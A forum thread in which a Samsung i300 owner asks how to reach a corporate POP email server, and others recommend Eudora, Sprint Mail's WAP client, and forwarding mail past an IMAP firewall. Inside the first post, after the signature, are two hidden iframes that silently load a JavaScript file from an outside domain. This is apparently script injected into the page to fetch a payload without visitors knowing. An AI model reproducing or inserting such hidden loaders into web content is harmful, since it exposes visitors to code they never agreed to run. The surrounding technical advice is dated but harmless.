+ Reply to Thread

Question email client with pop server connection

Hi.

I just bought a Samsung i300. Iam trying to figure a way to set-up a email client that can connect to my corporate email pop server and upload & download email.

I have seen some discussions on email via the sprintpcs browser ( which i am not interested in) i would like to read and compose my email offline.

the other email client on the phone has only a Sync option.

Can anyone help me with the following info :

a) Is there a email client that connects to a pop server available
    for the samsung i300
    b) if so how does it connect - dialing an ISP like MSN from the phone ( does the i300 have a built in modem) ( the koycera does this i understand)
    c) or can i connect thru sprint pcs ( wap service) to my pop server

Regards

Thomas<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hmmm.. Where to begin...

First of all, it all depends on whether or not your corporate email server is behind some firewall or gateway. If the answer is yes, then it all becomes a little more difficult than we can easily discuss here. If you are able to use an email client on a PC to access your corporate email over the Internet the answer then you are probably in luck.

If there is no firewall or gateway issue, there are a couple of options.

The first option (and my favorite) is to use Eudora email. It is a standard POP3 email client with more bells and whistles than most of the available Palm-based email clients. And best of all, the price is right (it is free!) There are other options, including Palm's own Multimail, Iambic Mail, etc.

The other option (that you inferred by you post) is a WAP-based solution. Sprint Mail, which is available through the Sprint Web app, under the messaging menu, has the capability to connect to a normal, private POP3 Server and bring the mail back to it's own Inbox. This is not as nice a solution, because it requires a constant connection while you are managing your mail (no ofline capabilities) and the WAP menus make it kind of cumbersome. It is a nice option to setup as a backup, however, if some other problems occur. I had my I300 do a hard reset on me while I was out of town. This wiped out all the data on my I300, including the apps I had loaded onto it. If it weren't for me having setup Sprint Mail, I would have been without an email client for the remainder of the trip.

The good thing about both of these options is that they both work using the Sprint ISP service (I.E. you don't have to dial into another ISP like MSN, etc). The only reason you might have to dial into something other than the Sprint service is if your corporate email server is only available if you dial directly into the corporate network rather than accessing it over the Internet.

Good luck!

thanks druce...

i can sleep easy now..

Originally posted by druce
    Hmmm.. Where to begin...

First of all, it all depends on whether or not your corporate email server is behind some firewall or gateway. If the answer is yes, then it all becomes a little more difficult than we can easily discuss here.
    What if this answer is no? Is a PPP conection possible via corporate ISP?

It would be convient if I didn't need to lug a laptop for cross country business trips.

Sure, I connect to my corporate ISP via PPP and get into the network. But my work Email server uses IMAP and is behind the firewall and Eudora doesnt support IMAP.

I tried to use Gopeherking service but it cant get past the firewall, so I am forwarding my work mails to my own ISP email account from where I can grab mails through Pop client Eudora..